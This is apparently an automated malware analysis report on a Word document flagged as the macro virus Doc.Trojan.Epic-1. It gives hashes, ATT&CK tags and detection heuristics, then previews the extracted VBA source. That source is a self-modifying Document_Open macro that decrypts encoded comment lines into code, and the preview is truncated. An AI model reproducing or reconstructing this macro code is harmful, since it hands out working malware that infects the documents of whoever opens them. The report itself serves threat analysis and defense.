Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 48410e3f3898b5e4…

MALICIOUS

Office (OLE)

34.5 KB Created: 2001-03-30 09:34:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 4dd39ca95b8170d78905e9fad19531ea SHA-1: 1fb12d1f7a188dcb84105cbad3e005c5ddc3e6c6 SHA-256: 48410e3f3898b5e47aee7549e3cabfe73e302690f088280a7ca9079113ecd6c8
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros. The 'Document_Open' macro is designed to execute upon opening the document. This macro appears to be obfuscated but is likely intended to download and execute a secondary payload, as indicated by the ClamAV detection 'Doc.Trojan.Epic-1'. The presence of VBA macros and the 'Document_Open' event strongly suggest a malicious document, likely delivered via spearphishing.

Heuristics 3

  • ClamAV: Doc.Trojan.Epic-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Epic-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21189 bytes
SHA-256: 0a0ca237154a9b46d1a265aefdc0938aa88757e18c17605495c97a3aaafa9317
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'
'Cross.Epik
Private Sub Document_Open()
On Error Resume Next: Set objDoc = ThisDocument.VBProject.VBComponents(1).CodeModule
For y = 12 To 46: If Mid(objDoc.Lines(y, 1), 1, 1) = Chr(39) Then objDoc.ReplaceLine y, c(Mid(objDoc.Lines(y, 1), 2), Val(Mid(objDoc.Lines(58, 1), 2))) & Chr(39)
Next: o8: End Sub
Private Sub Project_Open()
On Error Resume Next: Set objProj = ThisProject.VBProject.VBComponents(1).CodeModule
For y = 12 To 46: If Mid(objProj.Lines(y, 1), 1, 1) = Chr(39) Then objProj.ReplaceLine y, c(Mid(objProj.Lines(y, 1), 2), Val(Mid(objProj.Lines(58, 1), 2))) & Chr(39)
Next: o9: End Sub
Private Sub o8()
'Ł‚Ě©žž�žĚľ‰ź™�‰Ě˘‰”�ÖĚż‰�Ě�Ž†¨�ŹĚŃ̸„…ź¨�Ź™�‰‚�Âş®Ľž�†‰Ź�Âş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰
'�Ž†¨�ŹÂľ‰ś€ŤŹ‰ …‚‰ĚŮÔŔĚŻ„žÄßŐĹĚĘĚĄ‚�Äľ‚�ĚĆĚŘŮĹĚÇĚŢÜŮ
'Ş�žĚ•ĚŃĚÝ̸�ĚŘŰÖĚĄŠĚľ…‹„�Ä�Ž†¨�ŹÂ …‚‰źÄ•ŔĚÝĹŔĚÝĹĚŃĚŻ„žÄßŐĹ̸„‰‚Ě�Ž†¨�ŹÂľ‰ś€ŤŹ‰ …‚‰Ě•ŔĚŻ„žÄßŐĹĚĘĚŹÄ ‰Š�Ä�Ž†¨�ŹÂ …‚‰źÄ•ŔĚÝĹŔĚ ‰‚Ä�Ž†¨�ŹÂ …‚‰źÄ•ŔĚÝĹĹĚÁĚŢĹŔĚşŤ€Äˇ…�Ä�Ž†¨�ŹÂ …‚‰źÄŮÔŔĚÝĹŔĚŢĹĹĹ
'˘‰”�ÖĚż‰�Ě�Ž†Ľž�†ĚŃĚ«‰�ŁŽ†‰Ź�ÄŔĚΡżĽž�†‰Ź�­śś€…ŹŤ�…�‚ÎĹÂş®©Âş®Ľž�†‰Ź�źÄÝĹÂş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰
'ĄŠĚ�Ž†Ľž�†ĚŃĚÎÎ̸„‰‚Ěż‰�Ě�Ž†Ľž�†ĚŃĚŻž‰Ť�‰ŁŽ†‰Ź�ÄΡżĽž�†‰Ź�­śś€…ŹŤ�…�‚ÎĹÂş®©Âş®Ľž�†‰Ź�źÄÝĹÂş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰ÖĚšŤž˝™…�ĚŃĚÝ
'ĄŠĚ�Ž†Ľž�†Â …‚‰źÄŢŔĚÝĹĚĐŇĚÎËŻž�źźÂ©ś…‡Î̸„‰‚Ě�Ž†Ľž�†Â¨‰€‰�‰ …‚‰źĚÝŔĚ�Ž†Ľž�†ÂŻ�™‚�ŁŠ …‚‰źÖĚ�Ž†Ľž�†ÂĄ‚ź‰ž� …‚‰źĚÝŔĚ�Ž†¨�ŹÂ …‚‰źÄÝŔĚ�Ž†¨�ŹÂŻ�™‚�ŁŠ …‚‰źĹÖĚ�Ž†Ľž�†Âľ‰ś€ŤŹ‰ …‚‰ĚŰŔĚÎĽž…šŤ�‰Ěż™ŽĚĽž�†‰Ź�łŁś‰‚Ä®•şŤ€Ěś†Ě­źĚˇżĽž�†‰Ź�ÂĽž�†‰Ź�ĹÎ
'ĄŠĚ¸„…ź¨�Ź™�‰‚�ĚŃĚ­Ź�…š‰¨�Ź™�‰‚�̸„‰‚Ěż‰�Ě�Ž†¤�ź�ĚŃ̢�ž�Ť€¸‰�ś€Ť�‰Ě©€ź‰Ěż‰�Ě�Ž†¤�ź�ĚŃĚ­Ź�…š‰¨�Ź™�‰‚�
'ż‰�Ě�Ž†¤�ź�ĚŃĚ�Ž†¤�ź�Âş®Ľž�†‰Ź�Âş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰
'ĄŠĚ�Ž†¤�ź� …‚‰źÄŢŔĚÝĹĚĐŇĚÎËŻž�źźÂ©ś…‡Î̸„‰‚
'�Ž†¤�ź�¨‰€‰�‰ …‚‰źĚÝŔĚ�Ž†¤�ź�ÂŻ�™‚�ŁŠ …‚‰źÖĚ�Ž†¤�ź�ÂĄ‚ź‰ž� …‚‰źĚÝŔĚ�Ž†¨�ŹÂ …‚‰źÄÝŔĚ�Ž†¨�ŹÂŻ�™‚�ŁŠ …‚‰źĹ
'ĄŠĚ¸„…ź¨�Ź™�‰‚�ĚŃ̢�ž�Ť€¸‰�ś€Ť�‰Ě¸„‰‚Ě­Ź�…š‰¨�Ź™�‰‚�ÂżŤš‰­źĚ­Ź�…š‰¨�Ź™�‰‚�ÂŞ™€€˘Ť�‰ŔĚ›�Ş�ž�Ť�¨�Ź™�‰‚�
'©‚�ĚĄŠ
'ĄŠĚšŤž˝™…�ĚŃĚÝ̸„‰‚
'Ş�žĚ•ĚŃĚÝ̸�̸Ťź‡źÂŻ�™‚�ÖĚĄŠĚĄ‚ż�žÄÝŔ̸Ťź‡źÄ•Ĺ¢Ť�‰ŔĚΡ…Źž�ź�Š�ĚĽž�†‰Ź�ÎĹ̸„‰‚̸Ťź‡źÄ•ĹÂŻ€�ź‰
'˘‰”�ÖĚ©‚�ĚĄŠ
'ĄŠĚĄ‚ż�žÄÝŔ̸…�‰ŔĚÎÚÎĹ̸„‰‚
'ˇź‹®�”ĚÎż„�™€�ĚĄĚ„�€�Ě�•Ě„‰Ť�Ě™śĚ„…‹„ÓĚŁžĚź„�™€�ĚĄĚŽž‰Ť‡Ě��›‚ĚŤ‚�ĚŹž•ÓÎĚĘĚšŽŻž ŠĚĘĚλ„Ť�˟̕�™žĚ‰ś…‡ÓÎŔĚšŽ˝™‰ź�…�‚ŔĚΩś…‡Î
'Ş�žĚ•ĚŃĚÝ̸�ĚÝÜÖĚż„‰€€ĚÎś…‚‹ĚÁ�ĚÁ€ĚÝÜÜÜÜĚÝÜÂÚÚÂÜÂÜÎŔĚšŽ¤…�‰Ö̢‰”�ÖĚŞ�žĚ•ĚŃĚÝ̸�ĚÝÜÖĚż„‰€€ĚÎś…‚‹ĚÁ�ĚÁ€ĚÝÜÜÜÜĚÝÜÂŰÜÂÜÂÜÎŔĚšŽ¤…�‰Ö̢‰”�
'©‚�ĚĄŠÖĚŁś�…�‚źÂş…ž™źĽž��‰Ź�…�‚ĚŃĚŞŤ€ź‰ÖĚŁś�…�‚źÂżŤš‰˘�ž�Ť€Ľž��ś�ĚŃĚŞŤ€ź‰
End Sub
Private Sub o9()
'Ł‚Ě©žž�žĚľ‰ź™�‰Ě˘‰”�ÖĚż‰�Ě�Ž†Ľž�†ĚŃ̸„…źĽž�†‰Ź�Âş®Ľž�†‰Ź�Âş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰
'�Ž†Ľž�†Âľ‰ś€ŤŹ‰ …‚‰ĚŮÔŔĚŻ„žÄßŐĹĚĘĚĄ‚�Äľ‚�ĚĆĚŘŮĹĚÇĚŢÜŮ
'Ş�žĚ•ĚŃĚÝ̸�ĚŘŰÖĚĄŠĚľ…‹„�Ä�Ž†Ľž�†Â …‚‰źÄ•ŔĚÝĹŔĚÝĹĚŃĚŻ„žÄßŐĹ̸„‰‚Ě�Ž†Ľž�†Âľ‰ś€ŤŹ‰ …‚‰Ě•ŔĚŻ„žÄßŐĹĚĘĚŹÄ ‰Š�Ä�Ž†Ľž�†Â …‚‰źÄ•ŔĚÝĹŔĚ ‰‚Ä�Ž†Ľž�†Â …‚‰źÄ•ŔĚÝĹĹĚÁĚŢĹŔĚşŤ€Äˇ…�Ä�Ž†Ľž�†Â …‚‰źÄŮÔŔĚÝĹŔĚŢĹĹĹ
'˘‰”�ÖĚż‰�Ě�Ž†¨�ŹĚŃĚ«‰�ŁŽ†‰Ź�ÄŔĚλ�ž�­śś€…ŹŤ�…�‚ÎĹ¢�ž�Ť€¸‰�ś€Ť�‰Âş®Ľž�†‰Ź�Âş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰
'ĄŠĚ�Ž†¨�ŹĚŃĚÎÎ̸„‰‚Ěż‰�Ě�Ž†¨�ŹĚŃĚŻž‰Ť�‰ŁŽ†‰Ź�Äλ�ž�­śś€…ŹŤ�…�‚ÎĹÂş®Ľž�†‰Ź�Âş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰ÖĚšŤž˝™…�ĚŃĚÝ
'ĄŠĚ�Ž†¨�ŹÂ …‚‰źÄŢŔĚÝĹĚĐŇĚÎËŻž�źźÂ©ś…‡Î̸„‰‚Ě�Ž†¨�ŹÂ¨‰€‰�‰ …‚‰źĚÝŔĚ�Ž†¨�ŹÂŻ�™‚�ŁŠ …‚‰źÖĚ�Ž†¨�ŹÂĄ‚ź‰ž� …‚‰źĚÝŔĚ�Ž†Ľž�†Â …‚‰źÄÝŔĚ�Ž†Ľž�†ÂŻ�™‚�ŁŠ …‚‰źĹÖĚ�Ž†¨�ŹÂľ‰ś€ŤŹ‰ …‚‰ĚŰŔĚÎĽž…šŤ�‰Ěż™ŽĚĽž�†‰Ź�łŁś‰‚ÄĹÎ
'šŤžŻ™žž‰‚�ĚŃĚ­Ź�…š‰Ľž�†‰Ź�¢Ť�‰ÖĚŞ�žĚ•ĚŃĚÝ̸�ĚĽž�†‰Ź�źÂŻ�™‚�ÖĚż‰�Ě�Ž†¤�ź�ĚŃĚĽž�†‰Ź�źÄ•ĹÂş®Ľž�†‰Ź�Âş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰
'ĄŠĚ�Ž†¤�ź� …‚‰źÄŢŔĚÝĹĚĐŇĚÎËŻž�źźÂ©ś…‡Î̸„‰‚Ě�Ž†¤�ź�¨‰€‰�‰ …‚‰źĚÝŔĚ�Ž†¤�ź�ÂŻ�™‚�ŁŠ …‚‰źÖĚ�Ž†¤�ź�ÂĄ‚ź‰ž� …‚‰źĚÝŔĚ�Ž†Ľž�†Â …‚‰źÄÝŔĚ�Ž†Ľž�†ÂŻ�™‚�ŁŠ …‚‰źĹ
'Ş…€‰żŤš‰­źĚĽž�†‰Ź�źÄ•ĹÂŞ™€€˘Ť�‰
'˘‰”�ÖĚĽž�†‰Ź�źÄšŤžŻ™žž‰‚�Ĺ­Ź�…šŤ�‰
'ĄŠĚĄ‚ż�žÄÝŔ̸…�‰ŔĚÎÚÎĹ̸„‰‚
'ˇź‹®�”ĚÎż„�™€�ĚĄĚ„�€�Ě�•Ě„‰Ť�Ě™śĚ„…‹„ÓĚŁžĚź„�™€�ĚĄĚŽž‰Ť‡Ě��›‚ĚŤ‚�ĚŹž•ÓÎĚĘĚšŽŻž ŠĚĘĚλ„Ť�˟̕�™žĚ‰ś…‡ÓÎŔĚšŽ˝™‰ź�…�‚ŔĚΩś…‡Î
'Ş�žĚ•ĚŃĚÝ̸�ĚÝÜÖĚż„‰€€ĚÎś…‚‹ĚÁ�ĚÁ€ĚÝÜÜÜÜĚÝÜÂÚÚÂÜÂÜÎŔĚšŽ¤…�‰Ö̢‰”�ÖĚŞ�žĚ•ĚŃĚÝ̸�ĚÝÜÖĚż„‰€€ĚÎś…‚‹ĚÁ�ĚÁ€ĚÝÜÜÜÜĚÝÜÂŰÜÂÜÂÜÎŔĚšŽ¤…�‰Ö̢‰”�
'©‚�ĚĄŠÖĚ­śś€…ŹŤ�…�‚¡ŤŹž�ş…ž™źĽž��‰Ź�…�‚ĚŃĚŞŤ€ź‰ÖĚŞ…€
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.